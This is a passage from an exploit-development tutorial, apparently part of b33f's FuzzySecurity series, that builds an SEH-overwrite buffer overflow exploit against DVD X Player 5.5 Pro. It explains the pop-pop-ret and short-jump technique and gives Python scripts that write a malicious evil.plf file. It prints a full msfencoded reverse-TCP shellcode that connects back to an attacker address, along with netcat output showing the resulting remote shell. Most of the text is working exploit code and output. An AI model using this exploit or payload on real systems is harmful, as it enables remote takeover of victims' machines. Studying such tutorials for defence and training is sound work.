You may be wondering what this has to do with exploitation. If we control a large chunk of the buffer and overwrite one of the exception handler pointers, then when the exception fires Windows zeroes the registers, so we cannot simply jump into our shellcode. Fortunately this mechanism can be abused: instead of pointing SEH at the shellcode, we overwrite it with the address of a pop pop retn sequence. Recall that when the handler is called, esp+8 holds the address of the nSEH record, so once pop pop retn executes the program returns into nSEH. We control those four bytes, so we place a short jump there that redirects execution into the shellcode.
Most of these addresses are usable; just make sure the one you pick contains none of the bad characters. I usually choose a plain pop pop retn over a pop pop retn N. In the Immunity Debugger install directory you will find SEH.txt, which lists 2968 valid pointers. Because x86 is little-endian, the address has to be written into the buffer with its byte order reversed.
Pointer: 0x61617619 : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [EPG.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.21.2006 (C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll)
#!/usr/bin/python -w
filename="evil.plf"
# Shellcode is generated below and pasted in once the offsets are confirmed
Shellcode = (
""
)
#----------------------------------------------------------------------------------#
# (*) badchars = '\x00\x0A\x0D\x1A'                                                #
#                                                                                  #
# offset to: (2) nseh 608-bytes, (1) seh 612-bytes                                 #
# (2) nseh = '\xEB\x06' => jump short 6-bytes                                      #
# (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll                         #
# (3) Shellcode space = 1384-bytes                                                 #
#----------------------------------------------------------------------------------#
# SEH Exploit Structure:                                                           #
#                                 \---------------->                               #
# [AAA..................AAA] [nseh] [seh] [BBB..................BBB]               #
#                                 \-------------------------------------->         #
#                            <-------/                                             #
# (1) Initial SEH overwrite, SEH leads us back 4-bytes to nSEH                     #
# (2) nSEH jumps over SEH and redirects execution to our B's                       #
# (3) We place our Shellcode here ... Game Over!                                   #
#----------------------------------------------------------------------------------#
evil = "\x90"*20 + Shellcode
buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B"*(1384-len(evil))
textfile = open(filename , 'wb')   # binary mode: no byte of the buffer may be translated on write
textfile.write(buffer)
textfile.close()
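The pieces above (pop pop retn returning into nSEH, the short jump over the SEH pointer, little-endian packing of the handler address, and bad-character avoidance) are easy to get subtly wrong by hand. The following Python 3 helper is an added example written for this page, not code from the original tutorial. It builds and sanity-checks a buffer with the page's own numbers (nSEH at offset 608, 1384 bytes of space, the EPG.dll pop esi # pop edi # ret at 0x61617619) and uses a constructed int3 placeholder in place of real shellcode. The stack model in pop_pop_ret_target is a simplified picture of the handler calling convention, not a real process stack.

```python
import struct

BADCHARS = b"\x00\x0A\x0D\x1A"   # bad characters identified for this target
PPR_EPG_DLL = 0x61617619          # pop esi # pop edi # ret in EPG.dll (from SEH.txt)
NSEH_OFFSET = 608                 # bytes of filler before the nSEH field
SHELLCODE_SPACE = 1384            # bytes available after the SEH pointer


def short_jmp(distance):
    """Encode `jmp short rel8` (EB xx). The displacement is relative to the END of
    the two-byte instruction, so a jump of 6 placed in nSEH skips the remaining
    two nSEH bytes plus the four-byte SEH pointer."""
    if not -128 <= distance <= 127:
        raise ValueError("jmp short reaches only -128..+127 bytes, got %d" % distance)
    return b"\xEB" + struct.pack("<b", distance)


def jmp_short_target(instr_offset, encoded):
    """Offset (within the same buffer) at which a `jmp short` located at instr_offset lands."""
    if encoded[0] != 0xEB:
        raise ValueError("not a jmp short")
    (rel8,) = struct.unpack("<b", encoded[1:2])
    return instr_offset + 2 + rel8


def find_badchars(data, badchars=BADCHARS):
    """Every (offset, byte) in data that collides with a bad character."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def pop_pop_ret_target(handler_stack):
    """Simplified model (assumption, not a real stack) of what Windows leaves on the
    stack when it calls our overwritten handler:
    [return address, pExceptionRecord, pEstablisherFrame, pContext, pDispatcherContext].
    pEstablisherFrame is the address of the nSEH field, i.e. [esp+8]. Two pops
    discard the first two dwords and ret pops the third, so execution lands on nSEH."""
    esp = 0
    esp += 4                        # pop esi
    esp += 4                        # pop edi
    return handler_stack[esp // 4]  # ret -> [esp], which is [original esp + 8]


def build_seh_buffer(shellcode, nseh_offset=NSEH_OFFSET, ppr=PPR_EPG_DLL,
                     space=SHELLCODE_SPACE, badchars=BADCHARS, nop_sled=20):
    """Assemble [A*offset][nSEH][SEH][NOPs + shellcode][B padding] and refuse to
    emit a buffer that cannot work (too large, or containing a bad character)."""
    nseh = short_jmp(6) + b"\x90\x90"   # EB 06 90 90: hop over the SEH pointer
    seh = struct.pack("<I", ppr)        # little-endian: 0x61617619 -> 19 76 61 61
    payload = b"\x90" * nop_sled + shellcode
    if len(payload) > space:
        raise ValueError("payload is %d bytes, only %d available" % (len(payload), space))
    buf = b"A" * nseh_offset + nseh + seh + payload + b"B" * (space - len(payload))
    bad = find_badchars(buf, badchars)
    if bad:
        raise ValueError("bad characters at offsets %s" % [i for i, _ in bad])
    # The short jump must land on the first byte after the SEH record (the NOP sled).
    assert jmp_short_target(nseh_offset, buf[nseh_offset:nseh_offset + 2]) == nseh_offset + 8
    return buf


def parse_seh_record(buf, nseh_offset):
    """Read back the nSEH bytes and the SEH pointer (as an integer) from a built buffer."""
    nseh = buf[nseh_offset:nseh_offset + 4]
    (seh,) = struct.unpack("<I", buf[nseh_offset + 4:nseh_offset + 8])
    return nseh, seh


if __name__ == "__main__":
    placeholder = b"\xCC" * 341        # constructed int3 filler standing in for shellcode
    buf = build_seh_buffer(placeholder)
    nseh, seh = parse_seh_record(buf, NSEH_OFFSET)
    print("buffer %d bytes, nSEH=%s, SEH=0x%08x" % (len(buf), nseh.hex(), seh))
    with open("evil.plf", "wb") as f:
        f.write(buf)
```

One caveat the check makes visible: the jump distance itself can be a bad character. A `jmp short` of 10 or 13 bytes encodes as EB 0A or EB 0D, so the scan has to cover the whole buffer, not just the shellcode.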
Time to generate some shellcode. For a change, this time I decided to use a reverse shell...
root@bt:~# msfpayload -l
[...snip...]
    windows/shell_bind_tcp_xpfw    Disable the Windows ICF, then listen for a connection and spawn a command shell
    windows/shell_reverse_tcp      Connect back to attacker and spawn a command shell
    windows/speak_pwned            Causes the target to say "You Got Pwned" via the Windows Speech API
[...snip...]
root@bt:~# msfpayload windows/shell_reverse_tcp O

       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 314
       Rank: Normal

Provided by:
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell

root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R | msfencode -b '\x00\x0A\x0D\x1A' -t c
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
unsigned char buf[] =
"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54";
With some comments added, the final exploit looks like this:
#!/usr/bin/python -w
#----------------------------------------------------------------------------------#
# Exploit: DVD X Player 5.5 Pro SEH (local BOF) #
# OS: Tested XP PRO SP3 (EPG.dll should be universal) #
# Author: b33f (Ruben Boonen) #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications #
# /cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 3 of my Exploit Development tutorial series... #
# http://www.fuzzysecurity.com/tutorials/expDev/3.html #
#----------------------------------------------------------------------------------#
# root@bt:~# nc -lvp 9988 #
# listening on [any] 9988 ... #
# 192.168.111.128: inverse host lookup failed: Unknown server error #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1044 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# #
# G:\tutorial>ipconfig #
# ipconfig #
# #
# Windows IP Configuration #
# #
# #
# Ethernet adapter Local Area Connection: #
# #
# Connection-specific DNS Suffix . : localdomain #
# IP Address. . . . . . . . . . . . : 192.168.111.128 #
# Subnet Mask . . . . . . . . . . . : 255.255.255.0 #
# Default Gateway . . . . . . . . . : #
# #
# G:\tutorial> #
#----------------------------------------------------------------------------------#
filename="evil.plf"
#---------------------------------------------------------------------------------------------------------------#
# msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b '\x00\x0A\x0D\x1A' -t c #
# [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1) #
#---------------------------------------------------------------------------------------------------------------#
Shellcode = (
"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54")
#----------------------------------------------------------------------------------#
# (*) badchars = '\x00\x0A\x0D\x1A'                                                #
#                                                                                  #
# offset to: (2) nseh 608-bytes, (1) seh 612-bytes                                 #
# (2) nseh = '\xEB\x06' => jump short 6-bytes                                      #
# (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll                         #
# (3) Shellcode space = 1384-bytes                                                 #
#----------------------------------------------------------------------------------#
# SEH Exploit Structure:                                                           #
#                                 \---------------->                               #
# [AAA..................AAA] [nseh] [seh] [BBB..................BBB]               #
#                                 \-------------------------------------->         #
#                            <-------/                                             #
# (1) Initial SEH overwrite, SEH leads us back 4-bytes to nSEH                     #
# (2) nSEH jumps over SEH and redirects execution to our B's                       #
# (3) We place our Shellcode here ... Game Over!                                   #
#----------------------------------------------------------------------------------#
evil = "\x90"*20 + Shellcode
buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B"*(1384-len(evil))
textfile = open(filename , 'wb')   # binary mode: no byte of the buffer may be translated on write
textfile.write(buffer)
textfile.close()
In the listing below we can see that, once the exploit runs, we get our reverse shell. Game over!
root@bt:~/Desktop# nc -lvp 9988
listening on [any] 9988 ...
192.168.111.128: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1044
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.